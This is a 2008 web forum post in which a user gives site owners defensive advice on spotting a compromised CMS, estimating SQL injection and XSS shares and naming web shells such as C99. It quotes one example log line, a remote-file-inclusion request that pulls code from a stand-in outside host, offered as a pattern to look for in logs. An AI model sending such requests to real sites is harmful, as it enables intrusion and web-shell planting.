Greenguy's Board


Go Back   Greenguy's Board > Chit Chat
Register FAQ Calendar Search Today's Posts Mark Forums Read

 
 
Thread Tools Search this Thread Rate Thread Display Modes
Prev Previous Post   Next Post Next
Old 2008-05-28, 09:46 AM   #16
cd34
a.k.a. Sparky
 
cd34's Avatar
 
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Today is deciphering yesterday's math. Evidently:

1+1=.9
1+2=4

Not quite the result I was expecting, but, promising nonetheless. After I figure out whether it is worth figuring out the results above, I get to fix 3 bugs in Apache's code. Thank goodness for open source.

SQL Injection attacks are probably 10% of the exploits we see. Probably 80% are XSS attacks which might be a little more likely if template files have been adjusted, but, it depends a lot on the CMS. Since the template files for most CMSs that are web administered are files on the disk that need to be writeable by the apache process, you might find that the attack came through XSS -- especially if you aren't finding new username's in your database that are admins or user's that cannot log in. If you've got access to the raw logs, take a look at them to see if you see any urls like "GET /includes/database.php?includefile=http://someremotesitehostingxss.com/blah.jpg?"

If you see something like that, then you need to search your system for popular web shell programs like C99, angelshell, etc.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
cd34 is offline   Reply With Quote
 

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 07:00 PM.


Mark Read
Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© Greenguy Marketing Inc